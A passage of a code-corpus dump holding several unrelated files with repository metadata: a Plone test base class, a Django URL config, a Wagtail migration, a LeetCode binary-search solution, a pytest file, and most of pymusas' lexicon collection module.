# the ZCML.
ztc.installPackage('fui.fsbrowse')
# The order here is important: We first call the (deferred) function which
# installs the products we need for the fui.fsbrowse package. Then, we let
# PloneTestCase set up this product on installation.
setup_fui_fsbrowse()
ptc.setupPloneSite(products=['fui.fsbrowse'])
class FuiFsBrowseTestCase(ptc.PloneTestCase):
"""Base class used for test cases. """
class FuiFsBrowseFunctionalTestCase(ptc.FunctionalTestCase):
"""Test case class used for functional (doc-)tests """
def afterSetUp(self):
self.browser = Browser()
        # The following is useful when writing and debugging these browser
        # tests. It lets us see error messages properly.
self.browser.handleErrors = False
self.portal.error_log._ignored_exceptions = ()
# We then turn off the various portlets, because they sometimes duplicate links
        # and text (e.g. the navtree, the recent items listing) that we wish to
# test for in our own views. Having no portlets makes things easier.
left_column = getUtility(IPortletManager, name=u"plone.leftcolumn")
left_assignable = getMultiAdapter((self.portal, left_column), IPortletAssignmentMapping)
for name in left_assignable.keys():
del left_assignable[name]
right_column = getUtility(IPortletManager, name=u"plone.rightcolumn")
right_assignable = getMultiAdapter((self.portal, right_column), IPortletAssignmentMapping)
for name in right_assignable.keys():
del right_assignable[name]
def loginAdminClick(self):
portal_url = self.portal.absolute_url()
self.browser.open(portal_url + '/login_form?came_from=' + portal_url)
self.browser.getControl(name='__ac_name').value = portal_owner
self.browser.getControl(name='__ac_password').value = default_password
self.browser.getControl(name='submit').click()
    def logoutClick(self):
        self.browser.getLink("Log out").click()
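# Illustrative usage (hypothetical subclass; the class and test names below are
# examples only, not part of this package):
#
# class BrowseViewTest(FuiFsBrowseFunctionalTestCase):
#     def test_login_logout(self):
#         self.loginAdminClick()
#         self.failUnless('Log out' in self.browser.contents)
#         self.logoutClick()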
| [
"[email protected]"
] | |
1b2e1b202bfb75864577236b2e5b92566bd75690 | 0c8cbe2f3d69c92dcd0cc73da88f1340624809f2 | /search/urls.py | 3063c9854c0b76535380cbf020f58478264616b5 | [] | no_license | JunchuangYang/OnlineMusicWebsite | 83451b03aad5ba8bf8a7402a8e7f21ca5c0d1c24 | 475ebea77e8488f08883203e509cc8b7c9043bbd | refs/heads/master | 2021-07-25T01:27:14.673494 | 2020-04-05T08:23:07 | 2020-04-05T08:23:07 | 252,178,555 | 0 | 0 | null | 2021-06-10T22:43:53 | 2020-04-01T13:09:47 | JavaScript | UTF-8 | Python | false | false | 151 | py | #__author__ = 'lenovo'
from django.urls import path
from . import views
urlpatterns = [
    path('<int:page>.html', views.searchView, name='search')  # e.g. '2.html' resolves to views.searchView(request, page=2)
] | [
"[email protected]"
] | |
c08b6e8b95dcab03de174a133fc3da3f3b4e96d6 | 3d4161df479ef3335470f44fab40cfe42ec7889f | /cms/migrations/0002_personindexpage_personpage.py | f6d9419d89a20ff321207ee21b6f727f034ce8fb | [
"MIT"
] | permissive | kingsdigitallab/kdl-django | 540f680697c92a83da1e575b51259915284d979f | 14836dae329616d1cf1ad5b8c24508b6588b1300 | refs/heads/master | 2021-01-10T08:22:39.995509 | 2020-09-17T13:11:07 | 2020-09-17T13:11:07 | 60,765,060 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,331 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2016-07-21 09:50
from __future__ import unicode_literals
import cms.models.streamfield
from django.db import migrations, models
import django.db.models.deletion
import wagtail.wagtailcore.blocks
import wagtail.wagtailcore.fields
import wagtail.wagtaildocs.blocks
import wagtail.wagtailembeds.blocks
import wagtail.wagtailimages.blocks
class Migration(migrations.Migration):
dependencies = [
('wagtailcore', '0028_merge'),
('wagtailimages', '0013_make_rendition_upload_callable'),
('cms', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='PersonIndexPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.wagtailcore.fields.StreamField([(b'h2', wagtail.wagtailcore.blocks.CharBlock(classname='title', icon='title')), (b'h3', wagtail.wagtailcore.blocks.CharBlock(classname='title', icon='title')), (b'h4', wagtail.wagtailcore.blocks.CharBlock(classname='title', icon='title')), (b'h5', wagtail.wagtailcore.blocks.CharBlock(classname='title', icon='title')), (b'intro', wagtail.wagtailcore.blocks.RichTextBlock(icon='pilcrow')), (b'paragraph', wagtail.wagtailcore.blocks.RichTextBlock(icon='pilcrow')), (b'pullquote', wagtail.wagtailcore.blocks.StructBlock([(b'quote', wagtail.wagtailcore.blocks.TextBlock('quote title')), (b'attribution', wagtail.wagtailcore.blocks.CharBlock())])), (b'image', wagtail.wagtailcore.blocks.StructBlock([(b'image', wagtail.wagtailimages.blocks.ImageChooserBlock()), (b'caption', wagtail.wagtailcore.blocks.RichTextBlock()), (b'alignment', cms.models.streamfield.ImageFormatChoiceBlock())], icon='image', label='Aligned image')), (b'document', wagtail.wagtaildocs.blocks.DocumentChooserBlock(icon='doc-full-inverse')), (b'page', wagtail.wagtailcore.blocks.StructBlock([(b'page', wagtail.wagtailcore.blocks.PageChooserBlock()), (b'label', wagtail.wagtailcore.blocks.CharBlock())], icon='link')), (b'embed', wagtail.wagtailembeds.blocks.EmbedBlock(icon='media')), (b'html', wagtail.wagtailcore.blocks.StructBlock([(b'html', wagtail.wagtailcore.blocks.RawHTMLBlock()), (b'alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), (b'map_html', wagtail.wagtailcore.blocks.StructBlock([(b'html', wagtail.wagtailcore.blocks.RawHTMLBlock()), (b'alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Map HTML'))])),
],
options={
'abstract': False,
},
bases=('wagtailcore.page', models.Model),
),
migrations.CreateModel(
name='PersonPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('body', wagtail.wagtailcore.fields.StreamField([(b'h2', wagtail.wagtailcore.blocks.CharBlock(classname='title', icon='title')), (b'h3', wagtail.wagtailcore.blocks.CharBlock(classname='title', icon='title')), (b'h4', wagtail.wagtailcore.blocks.CharBlock(classname='title', icon='title')), (b'h5', wagtail.wagtailcore.blocks.CharBlock(classname='title', icon='title')), (b'intro', wagtail.wagtailcore.blocks.RichTextBlock(icon='pilcrow')), (b'paragraph', wagtail.wagtailcore.blocks.RichTextBlock(icon='pilcrow')), (b'pullquote', wagtail.wagtailcore.blocks.StructBlock([(b'quote', wagtail.wagtailcore.blocks.TextBlock('quote title')), (b'attribution', wagtail.wagtailcore.blocks.CharBlock())])), (b'image', wagtail.wagtailcore.blocks.StructBlock([(b'image', wagtail.wagtailimages.blocks.ImageChooserBlock()), (b'caption', wagtail.wagtailcore.blocks.RichTextBlock()), (b'alignment', cms.models.streamfield.ImageFormatChoiceBlock())], icon='image', label='Aligned image')), (b'document', wagtail.wagtaildocs.blocks.DocumentChooserBlock(icon='doc-full-inverse')), (b'page', wagtail.wagtailcore.blocks.StructBlock([(b'page', wagtail.wagtailcore.blocks.PageChooserBlock()), (b'label', wagtail.wagtailcore.blocks.CharBlock())], icon='link')), (b'embed', wagtail.wagtailembeds.blocks.EmbedBlock(icon='media')), (b'html', wagtail.wagtailcore.blocks.StructBlock([(b'html', wagtail.wagtailcore.blocks.RawHTMLBlock()), (b'alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Raw HTML')), (b'map_html', wagtail.wagtailcore.blocks.StructBlock([(b'html', wagtail.wagtailcore.blocks.RawHTMLBlock()), (b'alignment', cms.models.streamfield.HTMLAlignmentChoiceBlock())], icon='code', label='Map HTML'))])),
('first_name', models.CharField(max_length=256)),
('last_name', models.CharField(max_length=256)),
('intro', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('feed_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page', models.Model),
),
]
| [
"[email protected]"
] | |
704da8e2d99a67413d641ece944fa1a4042d6e8e | 07f33106eeda3dff104105250fb5d299938bff6b | /数组/1552_两球之间的磁力.py | c25e73b1afbf4e08ff3f0127684b147103fef6d8 | [] | no_license | fadeawaylove/leetcode_practice | 5e40c3bcf8f7721bc1a843b7ac820041eae5c89b | 74809f13f43e74a19f5a9f8d908cfe6a9ec774b2 | refs/heads/master | 2023-01-02T05:35:57.529975 | 2020-10-28T06:03:59 | 2020-10-28T06:03:59 | 267,814,149 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,504 | py | """
On Earth C-137, Rick discovers that if he puts two balls into his newly invented baskets, a special form of magnetic force forms between them. Rick has n empty baskets; the i-th basket is at position[i]. Morty wants to place m balls into the baskets so that the minimum magnetic force between any two balls is as large as possible.
Given two balls at positions x and y, the magnetic force between them is |x - y|.
Given an integer array position and an integer m, return the maximized minimum magnetic force.
Example 1:
Input: position = [1,2,3,4,7], m = 3
Output: 3
Explanation: Placing the 3 balls into the baskets at 1, 4 and 7 gives pairwise forces of [3, 3, 6]. The minimum force is 3; it cannot be made larger than 3.
Example 2:
Input: position = [5,4,3,2,1,1000000000], m = 2
Output: 999999999
Explanation: Using the baskets at 1 and 1000000000 maximizes the minimum force.
Constraints:
n == position.length
2 <= n <= 10^5
1 <= position[i] <= 10^9
All integers in position are distinct.
2 <= m <= position.length
Source: LeetCode (LeetCode-CN)
Link: https://leetcode-cn.com/problems/magnetic-force-between-two-balls
Copyright belongs to LeetCode; commercial reprints require official authorization, and non-commercial reprints must credit the source.
"""
from typing import List
class Solution:
def maxDistance(self, position: List[int], m: int) -> int:
        def check(g, pos):  # can all m balls be placed with every adjacent gap >= g?
cur = pos[0]
cnt = 1
for p in pos[1:]:
if p - cur >= g:
cnt += 1
cur = p
if cnt >= m:
return True
return False
position = sorted(position)
n = len(position)
        # predicted maximum gap: the gap if the balls were spread perfectly evenly
max_gap = (position[-1] - position[0]) // (m - 1)
min_gap = 1
for i in range(n - 1):
min_gap = min(min_gap, position[i + 1] - position[i])
start = min_gap
stop = max_gap
        # binary search for the largest feasible minimum gap
        while stop >= start:
            gap = (start + stop) // 2
            ret = check(gap, position)
            # print(ret, start, stop, gap)  # debug trace, disabled
            if ret:  # check passed, so try a larger gap
                start = gap + 1
            else:  # check failed, so shrink the gap
                stop = gap - 1
return start - 1
print(Solution().maxDistance([1, 2, 3, 4, 7], m=3))
# print(Solution().maxDistance([5, 4, 3, 2, 1, 1000000000], m=2))
# print(Solution().maxDistance([79, 74, 57, 22], m=4))
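# Quick self-checks mirroring the two examples in the problem statement above:
assert Solution().maxDistance([1, 2, 3, 4, 7], m=3) == 3
assert Solution().maxDistance([5, 4, 3, 2, 1, 1000000000], m=2) == 999999999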
| [
"[email protected]"
] | |
e8ec0cd093e9e24840ac391ba6873cc50d9f170a | 6b1b506139088aa30de9fd65cff9e3b6a3a36874 | /sofia_redux/toolkit/fitting/tests/test_polynomial/test_linear_vector_lstsq.py | 6e23b6f9ff2c919be37c0f4bf09177809de894cd | [
"BSD-3-Clause"
] | permissive | SOFIA-USRA/sofia_redux | df2e6ad402b50eb014b574ea561734334d70f84d | 493700340cd34d5f319af6f3a562a82135bb30dd | refs/heads/main | 2023-08-17T11:11:50.559987 | 2023-08-13T19:52:37 | 2023-08-13T19:52:37 | 311,773,000 | 12 | 2 | null | null | null | null | UTF-8 | Python | false | false | 542 | py | # Licensed under a 3-clause BSD style license - see LICENSE.rst
import numpy as np
import pytest
from sofia_redux.toolkit.fitting.polynomial \
import linear_equation, linear_vector_lstsq
@pytest.fixture
def data():
a = np.array([[3, 4], [5, 6.]])
b = np.array([[7., 8]])
alpha, beta = linear_equation(a, b)
return alpha, beta
def test_expected(data):
alpha, beta = data
result = linear_vector_lstsq(alpha, beta, np.array([[3.5, 4.5]]).T)
assert np.allclose(result, 5.5)
assert result.shape == (1, 1)
| [
"[email protected]"
] | |
9103b175f0dc0def46401425ba1ea74119a80dcb | 890b089c87b247cb06613530277c04d0eb6e3e91 | /pymusas/lexicon_collection.py | 40445856b05d88a2044eb708ad59c91127daff47 | [
"Apache-2.0"
] | permissive | UCREL/pymusas | e5978a400f1bbe783dbda5c736fce2dd546f0416 | 2afc3e919f0ffb1de42fda169c18fa757db0307a | refs/heads/main | 2023-09-03T15:52:38.396275 | 2023-08-17T22:34:46 | 2023-08-17T22:34:46 | 405,042,010 | 22 | 8 | Apache-2.0 | 2023-05-10T13:15:59 | 2021-09-10T10:26:50 | Python | UTF-8 | Python | false | false | 44,306 | py | import collections
from collections.abc import MutableMapping
import csv
from dataclasses import dataclass
from enum import Enum, unique
from os import PathLike
import re
import typing
from typing import DefaultDict, Dict, Generator, List, Optional, Set, Tuple, Union, cast
from urllib.parse import urlparse
import warnings
import srsly
from . import file_utils, utils
@unique
class LexiconType(str, Enum):
'''
    Descriptions of the type associated with single and Multi Word Expression (MWE)
    lexicon entries and templates. Any type with the word `NON_SPECIAL` means
that it does not use any special syntax, for example does not use wildcards
or curly braces.
The `value` attribute of each instance attribute is of type `str` describing
the type associated with that attribute. For the best explanation see the
example below.
# Instance Attributes
SINGLE_NON_SPECIAL : `LexiconType`
Single word lexicon lookup.
MWE_NON_SPECIAL : `LexiconType`
MWE lexicon lookup.
MWE_WILDCARD : `LexiconType`
MWE lexicon lookup using a wildcard.
MWE_CURLY_BRACES : `LexiconType`
MWE lexicon lookup using curly braces.
# Examples
```python
>>> from pymusas.lexicon_collection import LexiconType
>>> assert 'Single Non Special' == LexiconType.SINGLE_NON_SPECIAL
>>> assert 'Single Non Special' == LexiconType.SINGLE_NON_SPECIAL.value
>>> assert 'SINGLE_NON_SPECIAL' == LexiconType.SINGLE_NON_SPECIAL.name
>>> all_possible_values = {'Single Non Special', 'MWE Non Special',
... 'MWE Wildcard', 'MWE Curly Braces'}
>>> assert all_possible_values == {lexicon_type.value for lexicon_type in LexiconType}
```
'''
SINGLE_NON_SPECIAL = 'Single Non Special'
MWE_NON_SPECIAL = 'MWE Non Special'
MWE_WILDCARD = 'MWE Wildcard'
MWE_CURLY_BRACES = 'MWE Curly Braces'
def __repr__(self) -> str:
'''
Machine readable string. When printed and run `eval()` over the string
you should be able to recreate the object.
'''
return self.__str__()
@dataclass(init=True, repr=True, eq=True, order=False,
unsafe_hash=False, frozen=True)
class LexiconEntry:
'''
A LexiconEntry contains the `semantic_tags` that are associated with a
`lemma` and optionally the lemma's `POS`.
As frozen is true, the attributes cannot be assigned another value.
This data type is mainly used for single word lexicons, rather than
Multi Word Expression (MWE).
**Note** the parameters to the `__init__` are the same as the Instance
Attributes.
# Instance Attributes
lemma: `str`
The lemma of a token or the token itself.
semantic_tags: `List[str]`
The semantic tags associated with the `lemma` and optional `POS`.
The semantic tags are in rank order, the most likely tag
is the first tag in the list.
pos: `str`, optional (default = `None`)
The Part Of Speech (POS) to be associated with the `lemma`.
'''
lemma: str
semantic_tags: List[str]
pos: Optional[str] = None
@dataclass(init=True, repr=True, eq=True, order=False,
unsafe_hash=False, frozen=True)
class LexiconMetaData:
'''
A LexiconMetaData object contains all of the meta data about a given
single word or Multi Word Expression (MWE) lexicon entry. This meta data can
be used to help rank single and MWE entries when tagging.
As frozen is true, the attributes cannot be assigned another value.
**Note** the parameters to the `__init__` are the same as the Instance
Attributes.
# Instance Attributes
semantic_tags : `List[str]`
The semantic tags associated with the lexicon entry.
The semantic tags are in rank order, the most likely tag
is the first tag in the list.
n_gram_length : `int`
The n-gram size of the lexicon entry, e.g. `*_noun boot*_noun` will be
of length 2 and all single word lexicon entries will be of length 1.
lexicon_type : `LexiconType`
Type associated to the lexicon entry.
wildcard_count : `int`
Number of wildcards in the lexicon entry, e.g. `*_noun boot*_noun` will
be 2 and `ski_noun boot_noun` will be 0.
'''
semantic_tags: List[str]
n_gram_length: int
lexicon_type: LexiconType
wildcard_count: int
class LexiconCollection(MutableMapping):
'''
    This is a dictionary object that will hold :class:`LexiconEntry` data in a
    fast-to-access object. The keys of the dictionary are expected to be either just a
lemma or a combination of lemma and pos in the following format:
`{lemma}|{pos}` e.g. `Car|Noun`.
The value to each key is the associated semantic tags, whereby the semantic
tags are in rank order, the most likely tag is the first tag in the list.
    **Note** that the `lemma` can be the token
    itself rather than just its base form, e.g. can be `Cars` rather than `Car`.
This data type is used for single word lexicons, to store Multi Word
Expression (MWE) see the :class:`MWELexiconCollection`.
# Parameters
data: `Dict[str, List[str]]`, optional (default = `None`)
# Instance Attributes
data: `Dict[str, List[str]]`
Dictionary where the keys are `{lemma}|{pos}` and the values are
a list of associated semantic tags. If the `data` parameter given was
`None` then the value of this attribute will be an empty dictionary.
# Examples
``` python
>>> from pymusas.lexicon_collection import LexiconEntry, LexiconCollection
>>> lexicon_entry = LexiconEntry('London', ['Z3', 'Z1', 'A1'], 'noun')
>>> collection = LexiconCollection()
>>> collection.add_lexicon_entry(lexicon_entry)
>>> most_likely_tag = collection['London|noun'][0]
>>> assert most_likely_tag == 'Z3'
>>> least_likely_tag = collection['London|noun'][-1]
>>> assert least_likely_tag == 'A1'
```
'''
def __init__(self, data: Optional[Dict[str, List[str]]] = None) -> None:
self.data: Dict[str, List[str]] = {}
if data is not None:
self.data = data
def add_lexicon_entry(self, value: LexiconEntry,
include_pos: bool = True) -> None:
'''
Will add the :class:`LexiconEntry` to the collection, whereby the key is the
combination of the lemma and pos and the value are the semantic tags.
The lemma and pos are combined as follows: `{lemma}|{pos}`, e.g.
`Car|Noun`
If the pos value is None then then only the lemma is used: `{lemma}`,
e.g. `Car`
# Parameters
value: `LexiconEntry`
Lexicon Entry to add to the collection.
include_pos: `bool`, optional (default = `True`)
Whether to include the POS tag within the key.
'''
lemma = value.lemma
if value.pos is not None and include_pos:
lemma += f'|{value.pos}'
self[lemma] = value.semantic_tags
def to_dictionary(self) -> Dict[str, List[str]]:
'''
Returns the `data` instance attribute.
# Returns
`Dict[str, List[str]]`
'''
return self.data
def to_bytes(self) -> bytes:
'''
Serialises the :class:`LexiconCollection` to a bytestring.
# Returns
`bytes`
'''
return cast(bytes, srsly.msgpack_dumps(self.data))
@staticmethod
def from_bytes(bytes_data: bytes) -> "LexiconCollection":
'''
Loads :class:`LexiconCollection` from the given bytestring and
returns it.
# Parameters
bytes_data : `bytes`
The bytestring to load.
# Returns
:class:`LexiconCollection`
'''
return LexiconCollection(srsly.msgpack_loads(bytes_data))
@staticmethod
def from_tsv(tsv_file_path: Union[PathLike, str], include_pos: bool = True
) -> Dict[str, List[str]]:
'''
Given a `tsv_file_path` it will return a dictionary object that can
be used to create a :class:`LexiconCollection`.
Each line in the TSV file will be read in as a :class:`LexiconEntry`
and added to a temporary :class:`LexiconCollection`, once all lines
in the TSV have been parsed the return value is the `data` attribute of
the temporary :class:`LexiconCollection`.
If the file path is a URL, the file will be downloaded and cached using
:func:`pymusas.file_utils.download_url_file`.
If `include_pos` is True and the TSV file does not contain a
`pos` field heading then this will return a LexiconCollection that is
identical to a collection that ran this method with `include_pos` equal
to False.
        Code reference: the identification of a URL and the idea to do this
        have come from the [AllenNLP library](https://github.com/allenai/allennlp/blob/main/allennlp/common/file_utils.py#L205)
# Parameters
tsv_file_path: `Union[PathLike, str]`
A file path or URL to a TSV file that contains at least two
fields, with an optional third, with the following headings:
1. `lemma`,
2. `semantic_tags`
3. `pos` (Optional)
All other fields will be ignored.
include_pos: `bool`, optional (default = `True`)
            Whether to include the POS information, if the information is available,
or not. See :func:`add_lexicon_entry` for more information on this
parameter.
# Returns
`Dict[str, List[str]]`
# Raises
`ValueError`
If the minimum field headings, `lemma` and `semantic_tags`, do not
exist in the given TSV file.
# Examples
`include_pos` = `True`
``` python
>>> from pymusas.lexicon_collection import LexiconCollection
>>> welsh_lexicon_url = 'https://raw.githubusercontent.com/apmoore1/Multilingual-USAS/master/Welsh/semantic_lexicon_cy.tsv'
>>> welsh_lexicon_dict = LexiconCollection.from_tsv(welsh_lexicon_url, include_pos=True)
>>> welsh_lexicon_collection = LexiconCollection(welsh_lexicon_dict)
>>> assert welsh_lexicon_dict['ceir|noun'][0] == 'M3fn'
>>> assert welsh_lexicon_dict['ceir|verb'][0] == 'A9+'
```
`include_pos` = `False`
``` python
>>> from pymusas.lexicon_collection import LexiconCollection
>>> welsh_lexicon_url = 'https://raw.githubusercontent.com/apmoore1/Multilingual-USAS/master/Welsh/semantic_lexicon_cy.tsv'
>>> welsh_lexicon_dict = LexiconCollection.from_tsv(welsh_lexicon_url, include_pos=False)
>>> welsh_lexicon_collection = LexiconCollection(welsh_lexicon_dict)
>>> assert welsh_lexicon_dict['ceir'][0] == 'M3fn'
```
'''
minimum_field_names = {'lemma', 'semantic_tags'}
extra_field_names = ['pos']
field_names_to_extract = []
collection_from_tsv = LexiconCollection()
if not isinstance(tsv_file_path, str):
tsv_file_path = str(tsv_file_path)
parsed = urlparse(tsv_file_path)
if parsed.scheme in ("http", "https", "s3", "hf", "gs"):
tsv_file_path = file_utils.download_url_file(tsv_file_path)
with open(tsv_file_path, 'r', newline='', encoding='utf-8') as fp:
csv_reader = csv.DictReader(fp, delimiter='\t')
file_field_names: Set[str] = set()
if csv_reader.fieldnames:
file_field_names = set(csv_reader.fieldnames)
if minimum_field_names.issubset(file_field_names):
field_names_to_extract.extend(list(minimum_field_names))
else:
error_msg = ("The TSV file given should contain a header that"
" has at minimum the following fields "
f"{minimum_field_names}. The field names found "
f"were {file_field_names}")
raise ValueError(error_msg)
for extra_field_name in extra_field_names:
if extra_field_name in file_field_names:
field_names_to_extract.append(extra_field_name)
for row in csv_reader:
row_data: typing.MutableMapping[str, Union[str, List[str]]] = {}
for field_name in field_names_to_extract:
if field_name == 'semantic_tags':
row_data[field_name] = row[field_name].split()
else:
row_data[field_name] = row[field_name]
collection_from_tsv.add_lexicon_entry(LexiconEntry(**row_data),
include_pos=include_pos)
return collection_from_tsv.to_dictionary()
def __setitem__(self, key: str, value: List[str]) -> None:
self.data[key] = value
def __getitem__(self, key: str) -> List[str]:
return self.data[key]
def __delitem__(self, key: str) -> None:
del self.data[key]
def __len__(self) -> int:
return len(self.data)
def __iter__(self) -> Generator[str, None, None]:
for key in self.data:
yield key
def __str__(self) -> str:
'''
Human readable string.
'''
object_str = 'LexiconCollection('
for index, item in enumerate(self.items()):
object_str += f"('{item[0]}': {item[1]}), "
if index == 1:
object_str += '... '
break
        object_str += f') ({len(self)} entries in the collection)'
return object_str
def __repr__(self) -> str:
'''
Machine readable string. When printed and run `eval()` over the string
you should be able to recreate the object.
'''
return f'{self.__class__.__name__}(data={self.data})'
def __eq__(self, other: object) -> bool:
'''
Given another object to compare too it will return `True` if the other
object is the same class and contains the same `data` instance attribute.
# Parameters
other : `object`
The object to compare too.
# Returns
`True`
'''
if not isinstance(other, LexiconCollection):
return False
if len(self) != len(other):
return False
if self.data != other.data:
return False
return True
class MWELexiconCollection(MutableMapping):
r'''
A collection that stores Multi Word Expression (MWE) templates and their
associated meta data.
This collection allows users to:
1. Easily load MWE templates from a single TSV file.
2. Find strings that match MWE templates taking into account
any special syntax rules that should be applied, e.g. wildcards allow zero
or more characters to appear after the word token and/or Part Of Speech (POS) tag.
For more information on the MWE special syntax rules see the following
[notes](/usage/notes/mwe_syntax).
3. POS mapping, it can find strings that match MWE templates while taking
into account mapping from one POS tagset to another in both a one to one and
one to many mapping.
    **Note** that even though this is a sub-class of a MutableMapping it has a
time complexity of O(n) for deletion unlike the standard Python MutableMapping,
see the [following dict time complexities](https://wiki.python.org/moin/TimeComplexity),
this is due to keeping track of the `longest_non_special_mwe_template` and
`longest_wildcard_mwe_template`.
    As we do not currently support curly braces MWE template syntax,
any MWE templates that contain a `{` or `}` will be ignored and will not be
added to this collection, in addition a `UserWarning` will be raised stating
this.
# Parameters
data: `Dict[str, List[str]]`, optional (default = `None`)
Dictionary where the keys are MWE templates, of any :class:`LexiconType`,
and the values are a list of associated semantic tags.
pos_mapper : `Dict[str, List[str]]`, optional (default = `None`)
If not `None`, maps from the lexicon's POS tagset to the desired
POS tagset, whereby the mapping is a `List` of tags, at the moment there
is no preference order in this list of POS tags. The POS mapping is
        useful in situations where the lexicon's POS tagset is different from
the token's. **Note** that the longer the `List[str]` for each POS
mapping the longer it will take to match MWE templates. A one to one
mapping will have no speed impact on the tagger. A selection of POS
mappers can be found in :mod:`pymusas.pos_mapper`.
# Instance Attributes
**Note** if the `data` parameter given was `None` then the value of all
dictionary attributes will be an empty dictionary and all integer values will
be `0`. If `pos_mapper` parameter was `None` then the `pos_mapper` attribute
will be an empty dictionary.
meta_data: `Dict[str, LexiconMetaData]`
Dictionary where the keys are MWE templates, of any type, and the values
are their associated meta data stored in a :class:`LexiconMetaData` object.
longest_non_special_mwe_template : `int`
The longest MWE template with no special symbols measured by n-gram size.
For example the MWE template `ski_noun boot_noun` will be of length 2.
longest_wildcard_mwe_template : `int`
The longest MWE template with at least one wildcard (`*`) measured by n-gram size.
For example the MWE template `*_noun boot*_noun` will be of length 2.
longest_mwe_template : `int`
The longest MWE template regardless of type measured by n-gram size.
most_wildcards_in_mwe_template : `int`
The number of wildcards in the MWE template that contains the
most wildcards, e.g. the MWE template `ski_* *_noun` would contain 2
wildcards. This can be 0 if you have no wildcard MWE templates.
mwe_regular_expression_lookup: `Dict[int, Dict[str, Dict[str, re.Pattern]]]`
        A dictionary that maps each special syntax MWE template to its
regular expression pattern. These templates are found first by
their n-gram length and then their first character symbol. The regular
expression pattern is used for quick matching within the :func:`mwe_match`.
From the special syntax only wildcard (`*`) symbols are supported at the
moment.
pos_mapper : `Dict[str, List[str]]`
The given `pos_mapper`.
one_to_many_pos_tags : `Set[str]`
A set of POS tags that have a one to many mapping, this is created based
on the `pos_mapper`. This is empty if `pos_mapper` is `None`
pos_mapping_lookup : `Dict[str, str]`
        Only used if `pos_mapper` is not `None`. For all one-to-one POS mappings
        it stores the mapped POS MWE templates as keys and the original non-mapped
        MWE templates as values, which can be used to look up the meta
        data from `meta_data`.
pos_mapping_regular_expression_lookup : `Dict[LexiconType, Dict[int, Dict[str, Dict[str, re.Pattern]]]]`
Only used if `pos_mapper` is not `None` and will result in
        `mwe_regular_expression_lookup` being empty as it replaces its
        functionality and extends it by handling the one-to-many POS
mapping cases. When we have a one-to-many POS mapping case this requires
a regular expression mapping even for non special syntax MWE templates.
Compared to the `mwe_regular_expression_lookup` the first set of keys
represent the lexicon entry match type.
# Examples
``` python
>>> import re
>>> from pymusas.lexicon_collection import MWELexiconCollection, LexiconType
>>> mwe_collection = MWELexiconCollection()
>>> mwe_collection['*_noun boot*_noun'] = ['Z0', 'Z3']
>>> meta_data = mwe_collection['*_noun boot*_noun']
>>> assert 2 == meta_data.n_gram_length
>>> assert LexiconType.MWE_WILDCARD == meta_data.lexicon_type
>>> assert 2 == meta_data.wildcard_count
>>> most_likely_tag = meta_data.semantic_tags[0]
>>> assert most_likely_tag == 'Z0'
>>> least_likely_tag = meta_data.semantic_tags[-1]
>>> assert least_likely_tag == 'Z3'
>>> # change defaultdict to dict so the dictionary is easier to read and understand
>>> assert ({k: dict(v) for k, v in mwe_collection.mwe_regular_expression_lookup.items()}
... == {2: {'*': {'*_noun boot*_noun': re.compile('[^\\s_]*_noun\\ boot[^\\s_]*_noun')}}})
```
'''
def __init__(self, data: Optional[Dict[str, List[str]]] = None,
pos_mapper: Optional[Dict[str, List[str]]] = None) -> None:
self.meta_data: Dict[str, LexiconMetaData] = {}
self.longest_non_special_mwe_template = 0
self.longest_wildcard_mwe_template = 0
self.longest_mwe_template = 0
self.most_wildcards_in_mwe_template = 0
self.mwe_regular_expression_lookup: DefaultDict[int, DefaultDict[str, Dict[str, re.Pattern]]]\
= collections.defaultdict(lambda: collections.defaultdict(dict))
self.pos_mapper: Dict[str, List[str]] = {}
self.one_to_many_pos_tags: Set[str] = set()
self.pos_mapping_lookup: Dict[str, str] = {}
self.pos_mapping_regular_expression_lookup: DefaultDict[LexiconType, DefaultDict[int, DefaultDict[str, Dict[str, re.Pattern]]]]\
= collections.defaultdict(lambda: collections.defaultdict(lambda: collections.defaultdict(dict)))
if pos_mapper is not None:
self.pos_mapper = pos_mapper
for from_pos, to_pos in pos_mapper.items():
if len(to_pos) > 1:
self.one_to_many_pos_tags.add(from_pos)
if data is not None:
for key, value in data.items():
self[key] = value
def mwe_match(self, mwe_template: str, mwe_type: LexiconType
) -> List[str]:
'''
Returns a `List` of MWE templates, with the given `mwe_type`, that match
the given `mwe_template`. If there are no matches the returned `List`
will be empty.
This method applies all of the special syntax rules that should be applied
e.g. wildcards allow zero or more characters to appear after the word
token and/or Part Of Speech (POS) tag. For more information on the MWE
special syntax rules see the following [notes](/usage/notes/mwe_syntax).
# Parameters
mwe_template : `str`
The MWE template that you want to match against, e.g.
`river_noun bank_noun` or `ski_noun boots_noun`
mwe_type : `LexiconType`
The type of MWE templates that you want to return.
# Returns
        `List[str]`
# Examples
``` python
>>> from pymusas.lexicon_collection import MWELexiconCollection, LexiconType
>>> collection = MWELexiconCollection({'walking_noun boot_noun': ['Z2'], 'ski_noun boot_noun': ['Z2'], '*_noun boot_noun': ['Z2'], '*_noun *_noun': ['Z2']})
>>> assert [] == collection.mwe_match('river_noun bank_noun', LexiconType.MWE_NON_SPECIAL)
>>> assert ['walking_noun boot_noun'] == collection.mwe_match('walking_noun boot_noun', LexiconType.MWE_NON_SPECIAL)
>>> assert ['*_noun boot_noun', '*_noun *_noun'] == collection.mwe_match('walking_noun boot_noun', LexiconType.MWE_WILDCARD)
```
'''
mwe_templates_matches: List[str] = []
if self.pos_mapper:
if mwe_type == LexiconType.MWE_NON_SPECIAL:
mwe_mapped_template = self.pos_mapping_lookup.get(mwe_template, None)
if mwe_mapped_template is not None:
